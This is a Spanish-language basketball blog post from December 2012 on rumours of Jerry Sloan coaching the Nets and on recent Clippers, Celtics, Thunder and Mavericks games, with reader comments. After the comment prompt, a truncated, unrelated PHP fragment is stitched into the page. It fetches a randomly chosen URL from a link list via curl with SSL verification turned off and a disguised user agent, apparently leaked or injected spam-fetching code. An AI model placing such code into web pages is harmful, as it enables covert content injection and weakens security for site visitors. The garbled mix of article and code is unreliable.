La Crónica: Arrieros somos…

28 de December de 2012 por TheDeerHunter

La vida da muchas vueltas. Si se confirma el fichaje nada menos que de Jerry Sloan por los Nets como defienden varias fuentes próximas  se cerrará un morboso círculo en Brooklyn.

Aquel que empezó con el enfrentamiento con Deron Williams, la dimisión del técnico y el traspaso/vendeta de Jazz a los entonces New Jersey Nets, equipo menor donde los hubiera.

De momento no hay noticias de declaraciones del veterano técnico, pero D-8 ya se ha pronunciado vía twitter quitando hierro al asunto: “No voy a caer en el error de opinar sobre el tipo de decisiones que no me corresponden” o “Con Sloan he jugado el mejor baloncesto de mi carrera, si hubo algún problema entre nosotros ya no lo hay.”

Desconocemos si se trata de una pose o fue sincero, incluso pensando mal podríamos señalarlo como un toque de atención a la primera espada del equipo por parte de la dirección de la franquicia, por su reciente comportamiento en los últimos días de Avery Johnson.

Sloan se encuentra con una plantilla a su altura, potente y compensada, quizás no para ser campeones pero sí para dar guerra. Si alguien puede sacarle rendimiento ese es él, siempre que no explote en el intento.

En breves continuamos con la minicrónica del día…

6 minutos (by Simon)

Eso fue lo que le duraron los Celtics a los Clippers. A falta de 6 minutos para terminar el primer cuarto Clippers iba 15 puntos arriba y a partir de ahí la diferencia creció hasta los 29 puntos. Anoche los Clippers ni necesitaron la entrada de la banca para romper el partido. Cuando entró su temible banquill, el partido ya estaba muy de cara para los líderes de la liga, que se mantienen intratables con su décimoquinta victoria seguida.

Las primeras diferencias del partido se abrieron gracias a un par de triples casi seguidos de Willie Green. Posteriormente, un alley opp de Paul para Jordan, una bonita canasta de Griffin y un par de tiros seguidos de Butler elevaron la ventaja a 15 puntos.  Al comienzo del segundo cuarto los Celtics apretaron los dientes y con un par de triples consiguieron ponerse a tan solo cuatro puntos, pero ahí apareció el Big Three de los banquillos de la NBA para volver a llevar el partido por encima de los 10 puntos. Crawford, Barnes y Bledsoe deben estar actualmente entre los mejores perímetros de la liga en cuanto a aportación ofensiva, sin distinguir entre titulares y suplentes. Si le sumamos a un Odom que está asistiendo y reboteando muy bien desde hace unas 3 semanas y al siempre entregado y esforzado Turiaf te queda una banca de escándalo. En el tercer cuarto la ventaja se estabilizó en el arco de los 15 puntos y en el último, con Boston completamente derrotado, los suplentes de Clippers se dedicaron a hacer diabluras.  La diferencia entre ambos equipos no fue tanta como muestra el marcador final, pero el partido no tuvo historia en ningún momento. Barnes se fue a los 21 puntos con 5 triples, Griffin, Butler y Crawford también estuvieron en dobles dígitos en anotación,  Odom aportó 13 rebotes, 5 asistencias y 4 tapones (77-106).

Boston está al filo de los Play Off, ahora mismo ocupa la última plaza que da acceso a la post-temporada. Para Clippers esta temporada está siendo perfecta. Han conseguido montar un equipazo que funciona, practica un baloncesto muy entretenido lleno de jugadas impresionantes, con un banquillo que destroza a los rivales y los deja a merced de sus titulares, con un Paul que está sonando cada vez más para el MVP  y eso sin dar la sensación de estar exprimiéndose al máximo, Griffin que poco a poco va mostrando más cositas… En fin, que ahora mismo todo son rosas y halagos para Clippers pero esto es muy largo y apenas llevamos algo más de un tercio de la temporada regular. Eso sí, de momento, ¡que ganas hay de ver a estos Clippers cada noche que juegan!

El otro partido de la jornada fue mucho más apretado y emocionante. Oklahoma necesitó de una prórroga para vencer a Dallas Mavericks. Los Mavericks comenzaron el partido encendidos de la mano de un Darren Collison “on fire” toda la noche con 14 puntos en un primer cuarto que Dallas dominó con claridad. Tras un segundo cuarto igualado y con ambos equipos bastante desacertados llegábamos al descanso con los Mavs 3 puntos arriba. El tercer cuarto fue lo contrario del segundo. Igualado, sí, pero con ambos equipos anotando a grandes ritmos. Durant estuvo desatado y anotó todo lo que quiso durante el tercer cuarto, bien apoyado por Ibaka y Martin toda la noche pero no así por su segundo espada Russell  Westbrook, que llevaba toda la noche muy fallón. Así entramos al último cuarto en el que los Thunder llegaron a perder de 10 puntos. Durant que continuaba siendo apoyado principalmente por Martin, seguía a lo suyo hasta que a falta de dos minutos logró poner a su equipo por delante y unos tiros libres a falta de 3 segundos ponían a sus Thunder 3 arriba. Pero uno de los buzzer beaters más raros y afortunados que he visto en mi vida puso el empate en el marcador.

La prórroga fue el tiempo de redención de Westbrook. Con un Durant que falló sus tres lanzamientos en la prórroga, el base se vistió de salvador anotando 8 de los 13 puntos de su equipo en este periodo. Martin anotó un importante triple  e Ibaka apuntilló el marcador con un par de tiros libres. A los Mavs se les vio muy nerviosos e imprecisos en la prórroga fallando tiros incomprensibles y perdiendo algunos balones. El mejor saber hacer por parte de Oklahoma marcó la diferencia. A pesar de la prórroga menudo partidazo se marcó Durantula con 40 puntos, 8 rebotes, 5 asistencias y 3 tapones. Ibaka estuvo soberbio igualmente con 19 puntos, 17 rebotes y 5 tapones, Martin anotó 18 puntos desde el banquillo. Por parte de los de Mark Cuban el mejor fue Collison, al que su vuelta a la titularidad tras la marcha de Fisher le ha venido genial, con 32 puntos. OJ Mayo estuvo fatal y Nowitzki aun muy lento y recuperándose de su lesión pocas cosas positivas pudo aportar ayer (105-111).

PREMIOS

MVP: Exceptuando una mala actuación en la prórroga… o quizás más mérito teniendo en cuenta que el partidazo de Durant no quedó inflado por la producción extra.

Rookie: El único que jugó fue Jared Sullinger, aunque no se puede decir que se fue orgulloso a casa. Expulsado por 6 faltas en tan sólo 18 minutos. 4 puntitos, 5 rebotes, 2 asistencias y 1 robo.

Sorpresa: Resurrección paulatina de Lamar Odom, que es lo que le faltaba a los Clippers. Gran trabajo de intendencia, 13 rebotes, 5 asistencias y 4 tapones que son la punta de iceberg de su talento.

Decepción: Mayo está como la chata. 36 minutos para producir 4 puntos (1 de 7 en tiro) y perder 6 balones.

Esfuerzo en vano: El pequeño Darren Collison estuvo a punto de hacer lo de David frente a Goliat. Durant e Ibaka son mucho Goliat en este mundo.

TOP 5

Comenta

6 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Mi impresión es que irán a por un entrenador potente,ayer decían Phil Jackson para la 13/14,ahora Sloan…a ver en que acaba esto.

      Citar

  2. Ruxixón dice:
    #2

    Ahora suena Messina.Al parecer hay una buena relación entre el dueño ruso de los Nets y el entrenador del CSKA,debido a su anterior etapa en el equipo moscovita.Su experiencia en un gran banquillo como los Lakers,aunque fuera como asistente,juega a su favor.

      Citar

  3. simon dice:
    #3

    Ruxixón:
    Ahora suena Messina.Al parecer hay una buena relación entre el dueño ruso de los Netsy el entrenador del CSKA,debido a su anterior etapa en el equipo moscovita.Su experiencia en un gran banquillo como los Lakers,aunque fuera como asistente,juega a su favor.

    Pues sería, a mi juicio, salir de Guatemala para meterse en Guatepeor.

      Citar

  4. CAMPO2 dice:
    #4

    Capitana rodando, gatico maullando, 28-dic

      Citar

  5. Chipi dice:
    #5

    Dos cositas rápidas:

    – ¿Ya podemos hablar de crisis en los Celtics o tenemos que esperar un poquito más?

    – No he visto ningún partido de los Clippers este año. ¿A tan gran nivel está CP3? Lo digo porque leyendo y viendo resúmenes no parece que esté haciendo mucho ruido.

      Citar

  6. Esteban dice:
    #6

    sloan seria la hostia, por pergaminos, solo jackson esta por encima de el

    he visto que han golpeado mucho a avery jhonson en este blog, cosa que no comparto, mientras tuvo su equipo sano o medianamente sano, los tuvo en un 11-4, con una de las mejores defensas de la liga

    la racha negativa arranco con 5 derrotas consecutivas cuando falto por lesion LOPEZ y el equipo se cayo, hasta el momento venia muy bien, hasta se llevo el coach del mes y lopez sonaba como titular del all-star

    de ahi comenzo a tener errores graves y bueno termino asi, quebro la confianza de humpries que sin ser una estrella estaba rindiendo, mandandolo al banco, no le dio lugar a brooks cuando podia serle muy efectivo y se rehusaba a usar a teletovic que podia dar algo sin dudas

    todo esto sumado al bajon de deron y a una temporada muy floja de jojo, termino en un record de 14 y 14, IGUAL AL DE LOS CELTIC y mejor que el de los LAKERS, algo presuroso su despido sin dudas

    deja una floja imagen ofensiva el equipo, sus sistemas mediocres en ataque y la dependencia de jugadas de aislamiento para deron y jojo pocas veces efectivas, mas la falta de jugadas creadas exclusivamente para que LOPEZ se luzca

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>